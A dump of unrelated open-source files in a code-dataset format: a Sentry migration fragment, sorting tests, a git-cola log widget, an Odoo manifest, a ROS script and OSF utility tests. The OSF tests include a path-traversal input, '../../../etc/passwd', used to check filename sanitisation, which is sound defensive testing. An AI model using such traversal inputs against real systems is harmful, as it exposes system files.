'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
symmetrical = True
| bsd-3-clause |
jakubtyniecki/pact | tests/test_merge_rec.py | 1 | 1117 |
""" merge rec sort tests module """
import unittest
import random
from sort import merge_rec
from tests import helper
class MergeSortTests(unittest.TestCase):
""" merge rec sort unit tests class """
max = 100
arr = []
def setUp(self):
""" setting up for the test """
self.arr = random.sample(range(self.max), self.max)
def test_null_input(self):
""" should raise when input array is None """
# arrange
inp = None
# act
with self.assertRaises(TypeError) as ex:
merge_rec.sort(inp)
# assert
self.assertEqual("'NoneType' object is not iterable", str(ex.exception))
def test_empty_input(self):
""" should return [] when input array is empty """
# arrange
inp = []
# act
res = merge_rec.sort(inp)
# assert
self.assertEqual(len(inp), len(res))
def test_sort_a_given_array(self):
""" should sort a given array """
# act
res = merge_rec.sort(self.arr[:])
# assert
self.assertTrue(helper.is_sorted(res))
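# Allow running this test module directly (a common unittest pattern; this
# guard is an illustrative addition, not part of the original file):
if __name__ == '__main__':
    unittest.main()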
| mit |
git-cola/git-cola | cola/widgets/log.py | 3 | 2617 | from __future__ import absolute_import, division, unicode_literals
import time
from qtpy import QtGui
from qtpy import QtWidgets
from qtpy.QtCore import Qt
from qtpy.QtCore import Signal
from .. import core
from .. import qtutils
from ..i18n import N_
from . import defs
from .text import VimTextEdit
class LogWidget(QtWidgets.QFrame):
"""A simple dialog to display command logs."""
channel = Signal(object)
def __init__(self, context, parent=None, output=None):
QtWidgets.QFrame.__init__(self, parent)
self.output_text = VimTextEdit(context, parent=self)
self.highlighter = LogSyntaxHighlighter(self.output_text.document())
if output:
self.set_output(output)
self.main_layout = qtutils.vbox(defs.no_margin, defs.spacing, self.output_text)
self.setLayout(self.main_layout)
self.channel.connect(self.append, type=Qt.QueuedConnection)
def clear(self):
self.output_text.clear()
def set_output(self, output):
self.output_text.set_value(output)
def log_status(self, status, out, err=None):
msg = []
if out:
msg.append(out)
if err:
msg.append(err)
if status:
msg.append(N_('exit code %s') % status)
self.log('\n'.join(msg))
def append(self, msg):
"""Append to the end of the log message"""
if not msg:
return
msg = core.decode(msg)
cursor = self.output_text.textCursor()
cursor.movePosition(cursor.End)
text = self.output_text
# NOTE: the ': ' colon-SP suffix is for the syntax highlighter
prefix = core.decode(time.strftime('%Y-%m-%d %H:%M:%S: ')) # ISO-8601
for line in msg.split('\n'):
cursor.insertText(prefix + line + '\n')
cursor.movePosition(cursor.End)
text.setTextCursor(cursor)
def log(self, msg):
"""Add output to the log window"""
# Funnel through a Qt queued connection to allow thread-safe logging from
# asynchronous QRunnables, filesystem notification, etc.
self.channel.emit(msg)
class LogSyntaxHighlighter(QtGui.QSyntaxHighlighter):
"""Implements the log syntax highlighting"""
def __init__(self, doc):
QtGui.QSyntaxHighlighter.__init__(self, doc)
palette = QtGui.QPalette()
QPalette = QtGui.QPalette
self.disabled_color = palette.color(QPalette.Disabled, QPalette.Text)
def highlightBlock(self, text):
end = text.find(': ')
if end > 0:
self.setFormat(0, end + 1, self.disabled_color)
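# Usage sketch (illustrative; assumes an application `context` object and a
# running QApplication, neither of which is created in this module):
#
#   widget = LogWidget(context)
#   widget.log('fetching origin...')        # thread-safe append via the signal
#   widget.log_status(1, '', 'fatal: ...')  # logs stderr plus the exit code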
| gpl-2.0 |
hassoon3/odoo | addons/l10n_us/__openerp__.py | 341 | 1763 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'United States - Chart of accounts',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Localization/Account Charts',
'description': """
United States - Chart of accounts.
==================================
""",
'website': 'http://www.openerp.com',
'depends': ['account_chart', 'account_anglo_saxon'],
'data': [
'l10n_us_account_type.xml',
'account_chart_template.xml',
'account.account.template.csv',
'account_tax_code_template.xml',
'account_tax_template.xml',
'account_chart_template_after.xml',
'l10n_us_wizard.xml'
],
'demo': [],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ResByte/graph_slam | scripts/robot.py | 1 | 1487 | #!/usr/bin/env python
import roslib
import rospy
import sys
from geometry_msgs.msg import Twist
import numpy as np
from nav_msgs.msg import Odometry
from tf.transformations import euler_from_quaternion
import matplotlib.pyplot as plt
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
import itertools
class Robot():
"""This is a generic robot class to implement various machine learning algorithms and """
def __init__(self):
self.pose = [] #check if this needs to be initialized
rospy.init_node('robot',anonymous = False)
def odomCb(self,msg):
#print msg.pose.pose
quaternion = (msg.pose.pose.orientation.x,msg.pose.pose.orientation.y,msg.pose.pose.orientation.z,msg.pose.pose.orientation.w)
euler = euler_from_quaternion(quaternion)
#print euler
self.pose = [msg.pose.pose.position.x,msg.pose.pose.position.y,euler[2]]
print self.pose[0],self.pose[1],self.pose[2]
def odomSub(self):
rospy.Subscriber('/odom',Odometry,self.odomCb)
def cloudCb(self,data):
# convert the PointCloud2 message into an Nx3 numpy array of (x, y, z) points
points = pc2.read_points(data, field_names=('x', 'y', 'z'), skip_nans=True)
cloud = np.asarray(list(points))
print cloud.shape
def cloudSub(self):
rospy.Subscriber('/camera/depth/points',PointCloud2,self.cloudCb)
if __name__ == '__main__':
print "init_node"
try:
robot = Robot()
while not rospy.is_shutdown():
#robot.odomSub()
robot.cloudSub()
except rospy.ROSInterruptException:
rospy.loginfo("node terminated.")
| gpl-2.0 |
erinspace/osf.io | tests/test_utils.py | 1 | 18008 | # -*- coding: utf-8 -*-
import datetime
import mock
import os
import pytest
import time
import unittest
from django.utils import timezone
from flask import Flask
from nose.tools import * # noqa (PEP8 asserts)
import blinker
from tests.base import OsfTestCase, DbTestCase
from osf_tests.factories import RegistrationFactory, UserFactory, fake_email
from framework.auth.utils import generate_csl_given_name
from framework.routing import Rule, json_renderer
from framework.utils import secure_filename, throttle_period_expired
from api.base.utils import waterbutler_api_url_for
from osf.utils.functional import rapply
from website.routes import process_rules, OsfWebRenderer
from website import settings
from website.util import paths
from website.util import web_url_for, api_url_for, is_json_request, conjunct, api_v2_url
from website.project import utils as project_utils
from website.profile import utils as profile_utils
try:
import magic # noqa
LIBMAGIC_AVAILABLE = True
except ImportError:
LIBMAGIC_AVAILABLE = False
HERE = os.path.dirname(os.path.abspath(__file__))
class TestTimeUtils(unittest.TestCase):
def test_throttle_period_expired_no_timestamp(self):
is_expired = throttle_period_expired(timestamp=None, throttle=30)
assert_true(is_expired)
def test_throttle_period_expired_using_datetime(self):
timestamp = timezone.now()
is_expired = throttle_period_expired(timestamp=(timestamp + datetime.timedelta(seconds=29)), throttle=30)
assert_false(is_expired)
is_expired = throttle_period_expired(timestamp=(timestamp - datetime.timedelta(seconds=31)), throttle=30)
assert_true(is_expired)
def test_throttle_period_expired_using_timestamp_in_seconds(self):
timestamp = int(time.time())
is_expired = throttle_period_expired(timestamp=(timestamp + 29), throttle=30)
assert_false(is_expired)
is_expired = throttle_period_expired(timestamp=(timestamp - 31), throttle=30)
assert_true(is_expired)
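# For reference, the behaviour exercised above amounts to the following
# (a sketch inferred from these tests; the real framework.utils
# implementation may differ):
#
#   def throttle_period_expired(timestamp, throttle):
#       if timestamp is None:
#           return True
#       if isinstance(timestamp, datetime.datetime):
#           return (timezone.now() - timestamp).total_seconds() > throttle
#       return (time.time() - timestamp) > throttle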
class TestUrlForHelpers(unittest.TestCase):
def setUp(self):
def dummy_view():
return {}
def dummy_guid_project_view():
return {}
def dummy_guid_profile_view():
return {}
self.app = Flask(__name__)
api_rule = Rule([
'/api/v1/<pid>/',
'/api/v1/<pid>/component/<nid>/'
], 'get', dummy_view, json_renderer)
web_rule = Rule([
'/<pid>/',
'/<pid>/component/<nid>/'
], 'get', dummy_view, OsfWebRenderer)
web_guid_project_rule = Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', dummy_guid_project_view, OsfWebRenderer)
web_guid_profile_rule = Rule([
'/profile/<pid>/',
], 'get', dummy_guid_profile_view, OsfWebRenderer)
process_rules(self.app, [api_rule, web_rule, web_guid_project_rule, web_guid_profile_rule])
def test_api_url_for(self):
with self.app.test_request_context():
assert api_url_for('dummy_view', pid='123') == '/api/v1/123/'
def test_api_v2_url_with_port(self):
full_url = api_v2_url('/nodes/abcd3/contributors/',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/nodes/abcd3/contributors/')
# Handles URL the same way whether or not user enters a leading slash
full_url = api_v2_url('nodes/abcd3/contributors/',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/nodes/abcd3/contributors/')
def test_api_v2_url_with_params(self):
"""Handles- and encodes- URLs with parameters (dict and kwarg) correctly"""
full_url = api_v2_url('/nodes/abcd3/contributors/',
params={'filter[fullname]': 'bob'},
base_route='https://api.osf.io/',
base_prefix='v2/',
page_size=10)
assert_equal(full_url, 'https://api.osf.io/v2/nodes/abcd3/contributors/?filter%5Bfullname%5D=bob&page_size=10')
def test_api_v2_url_base_path(self):
"""Given a blank string, should return the base path (domain + port + prefix) with no extra cruft at end"""
full_url = api_v2_url('',
base_route='http://localhost:8000/',
base_prefix='v2/')
assert_equal(full_url, 'http://localhost:8000/v2/')
def test_web_url_for(self):
with self.app.test_request_context():
assert web_url_for('dummy_view', pid='123') == '/123/'
def test_web_url_for_guid(self):
with self.app.test_request_context():
# check /project/<pid>
assert_equal('/pid123/', web_url_for('dummy_guid_project_view', pid='pid123', _guid=True))
assert_equal('/project/pid123/', web_url_for('dummy_guid_project_view', pid='pid123', _guid=False))
assert_equal('/project/pid123/', web_url_for('dummy_guid_project_view', pid='pid123'))
# check /project/<pid>/node/<nid>
assert_equal('/nid321/', web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321', _guid=True))
assert_equal(
'/project/pid123/node/nid321/',
web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321', _guid=False))
assert_equal(
'/project/pid123/node/nid321/',
web_url_for('dummy_guid_project_view', pid='pid123', nid='nid321'))
# check /profile/<pid>
assert_equal('/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123', _guid=True))
assert_equal('/profile/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123', _guid=False))
assert_equal('/profile/pro123/', web_url_for('dummy_guid_profile_view', pid='pro123'))
def test_web_url_for_guid_regex_conditions(self):
with self.app.test_request_context():
# regex matches limit keys to a minimum of 5 alphanumeric characters.
# check /project/<pid>
assert_not_equal('/123/', web_url_for('dummy_guid_project_view', pid='123', _guid=True))
assert_equal('/123456/', web_url_for('dummy_guid_project_view', pid='123456', _guid=True))
# check /project/<pid>/node/<nid>
assert_not_equal('/321/', web_url_for('dummy_guid_project_view', pid='123', nid='321', _guid=True))
assert_equal('/654321/', web_url_for('dummy_guid_project_view', pid='123456', nid='654321', _guid=True))
# check /profile/<pid>
assert_not_equal('/123/', web_url_for('dummy_guid_profile_view', pid='123', _guid=True))
assert_equal('/123456/', web_url_for('dummy_guid_profile_view', pid='123456', _guid=True))
def test_web_url_for_guid_case_sensitive(self):
with self.app.test_request_context():
# check /project/<pid>
assert_equal('/ABCdef/', web_url_for('dummy_guid_project_view', pid='ABCdef', _guid=True))
# check /project/<pid>/node/<nid>
assert_equal('/GHIjkl/', web_url_for('dummy_guid_project_view', pid='ABCdef', nid='GHIjkl', _guid=True))
# check /profile/<pid>
assert_equal('/MNOpqr/', web_url_for('dummy_guid_profile_view', pid='MNOpqr', _guid=True))
def test_web_url_for_guid_invalid_unicode(self):
with self.app.test_request_context():
# unicode ids are not supported when encoding guid urls.
# check /project/<pid>
assert_not_equal('/ø∆≤µ©/', web_url_for('dummy_guid_project_view', pid='ø∆≤µ©', _guid=True))
assert_equal(
'/project/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/',
web_url_for('dummy_guid_project_view', pid='øˆ∆≤µˆ', _guid=True))
# check /project/<pid>/node/<nid>
assert_not_equal(
'/ø∆≤µ©/',
web_url_for('dummy_guid_project_view', pid='ø∆≤µ©', nid='©µ≤∆ø', _guid=True))
assert_equal(
'/project/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/node/%C2%A9%C2%B5%E2%89%A4%E2%88%86%C3%B8/',
web_url_for('dummy_guid_project_view', pid='øˆ∆≤µˆ', nid='©µ≤∆ø', _guid=True))
# check /profile/<pid>
assert_not_equal('/ø∆≤µ©/', web_url_for('dummy_guid_profile_view', pid='ø∆≤µ©', _guid=True))
assert_equal(
'/profile/%C3%B8%CB%86%E2%88%86%E2%89%A4%C2%B5%CB%86/',
web_url_for('dummy_guid_profile_view', pid='øˆ∆≤µˆ', _guid=True))
def test_api_url_for_with_multiple_urls(self):
with self.app.test_request_context():
url = api_url_for('dummy_view', pid='123', nid='abc')
assert url == '/api/v1/123/component/abc/'
def test_web_url_for_with_multiple_urls(self):
with self.app.test_request_context():
url = web_url_for('dummy_view', pid='123', nid='abc')
assert url == '/123/component/abc/'
def test_is_json_request(self):
with self.app.test_request_context(content_type='application/json'):
assert_true(is_json_request())
with self.app.test_request_context(content_type=None):
assert_false(is_json_request())
with self.app.test_request_context(content_type='application/json;charset=UTF-8'):
assert_true(is_json_request())
def test_waterbutler_api_url_for(self):
with self.app.test_request_context():
url = waterbutler_api_url_for('fakeid', 'provider', '/path')
assert_in('/fakeid/', url)
assert_in('/path', url)
assert_in('/providers/provider/', url)
assert_in(settings.WATERBUTLER_URL, url)
def test_waterbutler_api_url_for_internal(self):
settings.WATERBUTLER_INTERNAL_URL = 'http://1.2.3.4:7777'
with self.app.test_request_context():
url = waterbutler_api_url_for('fakeid', 'provider', '/path', _internal=True)
assert_not_in(settings.WATERBUTLER_URL, url)
assert_in(settings.WATERBUTLER_INTERNAL_URL, url)
assert_in('/fakeid/', url)
assert_in('/path', url)
assert_in('/providers/provider', url)
class TestFrameworkUtils(unittest.TestCase):
def test_leading_underscores(self):
assert_equal(
'__init__.py',
secure_filename('__init__.py')
)
def test_werkzeug_cases(self):
"""Test that Werkzeug's tests still pass for our wrapped version"""
# Copied from Werkzeug
# BSD licensed - original at github.com/mitsuhiko/werkzeug,
# /tests/test_utils.py, line 282, commit 811b438
assert_equal(
'My_cool_movie.mov',
secure_filename('My cool movie.mov')
)
assert_equal(
'etc_passwd',
secure_filename('../../../etc/passwd')
)
assert_equal(
'i_contain_cool_umlauts.txt',
secure_filename(u'i contain cool \xfcml\xe4uts.txt')
)
class TestWebpackFilter(unittest.TestCase):
def setUp(self):
self.asset_paths = {'assets': 'assets.07123e.js'}
def test_resolve_asset(self):
asset = paths.webpack_asset('assets.js', self.asset_paths, debug=False)
assert_equal(asset, '/static/public/js/assets.07123e.js')
def test_resolve_asset_not_found_and_not_in_debug_mode(self):
with assert_raises(KeyError):
paths.webpack_asset('bundle.js', self.asset_paths, debug=False)
class TestWebsiteUtils(unittest.TestCase):
def test_conjunct(self):
words = []
assert_equal(conjunct(words), '')
words = ['a']
assert_equal(conjunct(words), 'a')
words = ['a', 'b']
assert_equal(conjunct(words), 'a and b')
words = ['a', 'b', 'c']
assert_equal(conjunct(words), 'a, b, and c')
assert_equal(conjunct(words, conj='or'), 'a, b, or c')
def test_rapply(self):
inputs = {
'foo': 'bar',
'baz': {
'boom': ['kapow'],
'bang': 'bam'
},
'bat': ['man']
}
outputs = rapply(inputs, str.upper)
assert_equal(outputs['foo'], 'bar'.upper())
assert_equal(outputs['baz']['boom'], ['kapow'.upper()])
assert_equal(outputs['baz']['bang'], 'bam'.upper())
assert_equal(outputs['bat'], ['man'.upper()])
r_assert = lambda s: assert_equal(s.upper(), s)
rapply(outputs, r_assert)
def test_rapply_on_list(self):
inputs = range(5)
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_equal(outputs[i], i + 1)
def test_rapply_on_tuple(self):
inputs = tuple(i for i in range(5))
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_equal(outputs[i], i + 1)
assert_equal(type(outputs), tuple)
def test_rapply_on_set(self):
inputs = set(i for i in range(5))
add_one = lambda n: n + 1
outputs = rapply(inputs, add_one)
for i in inputs:
assert_in(i + 1, outputs)
assert_true(isinstance(outputs, set))
def test_rapply_on_str(self):
input = 'bob'
convert = lambda s: s.upper()
outputs = rapply(input, convert)
assert_equal('BOB', outputs)
assert_true(isinstance(outputs, basestring))
def test_rapply_preserves_args_and_kwargs(self):
def zero_if_not_check(item, check, checkFn=lambda n: n):
if check and checkFn(item):
return item
return 0
inputs = range(5)
outputs = rapply(inputs, zero_if_not_check, True, checkFn=lambda n: n % 2)
assert_equal(outputs, [0, 1, 0, 3, 0])
outputs = rapply(inputs, zero_if_not_check, False, checkFn=lambda n: n % 2)
assert_equal(outputs, [0, 0, 0, 0, 0])
class TestProjectUtils(OsfTestCase):
def set_registered_date(self, reg, date):
reg.registered_date = date
reg.save()
def test_get_recent_public_registrations(self):
count = 0
for i in range(5):
reg = RegistrationFactory()
reg.is_public = True
count = count + 1
tdiff = timezone.now() - datetime.timedelta(days=count)
self.set_registered_date(reg, tdiff)
regs = [r for r in project_utils.recent_public_registrations()]
assert_equal(len(regs), 5)
for i in range(4):
assert_true(regs[i].registered_date > regs[i + 1].registered_date)
for i in range(5):
reg = RegistrationFactory()
reg.is_public = True
count = count + 1
tdiff = timezone.now() - datetime.timedelta(days=count)
self.set_registered_date(reg, tdiff)
regs = [r for r in project_utils.recent_public_registrations(7)]
assert_equal(len(regs), 7)
class TestProfileUtils(DbTestCase):
def setUp(self):
self.user = UserFactory()
def test_get_other_user_profile_image_default_size(self):
profile_image = profile_utils.get_profile_image_url(self.user)
assert_true(profile_image)
def test_get_other_user_profile_image(self):
profile_image = profile_utils.get_profile_image_url(self.user, size=25)
assert_true(profile_image)
class TestSignalUtils(unittest.TestCase):
def setUp(self):
self.signals = blinker.Namespace()
self.signal_ = self.signals.signal('signal-')
self.mock_listener = mock.MagicMock()
def listener(self, signal):
self.mock_listener()
def test_signal(self):
self.signal_.connect(self.listener)
self.signal_.send()
assert_true(self.mock_listener.called)
class TestUserUtils(unittest.TestCase):
def test_generate_csl_given_name_with_given_middle_suffix(self):
given_name = 'Cause'
middle_names = 'Awesome'
suffix = 'Jr.'
csl_given_name = generate_csl_given_name(
given_name=given_name, middle_names=middle_names, suffix=suffix
)
assert_equal(csl_given_name, 'Cause A, Jr.')
def test_generate_csl_given_name_with_given_middle(self):
given_name = 'Cause'
middle_names = 'Awesome'
csl_given_name = generate_csl_given_name(
given_name=given_name, middle_names=middle_names
)
assert_equal(csl_given_name, 'Cause A')
def test_generate_csl_given_name_with_given_suffix(self):
given_name = 'Cause'
suffix = 'Jr.'
csl_given_name = generate_csl_given_name(
given_name=given_name, suffix=suffix
)
assert_equal(csl_given_name, 'Cause, Jr.')
def test_generate_csl_given_name_with_given(self):
given_name = 'Cause'
csl_given_name = generate_csl_given_name(given_name)
assert_equal(csl_given_name, 'Cause')
@pytest.mark.django_db
class TestUserFactoryConflict:
def test_build_create_user_time_conflict(self):
        # Test that built and created user factories do not produce conflicting
        # usernames when they are generated in quick succession
user_email_one = fake_email()
user_email_two = fake_email()
assert user_email_one != user_email_two
user_one_build = UserFactory.build()
user_two_build = UserFactory.build()
assert user_one_build.username != user_two_build.username
user_one_create = UserFactory()
user_two_create = UserFactory()
assert user_one_create.username != user_two_create.username
| apache-2.0 |
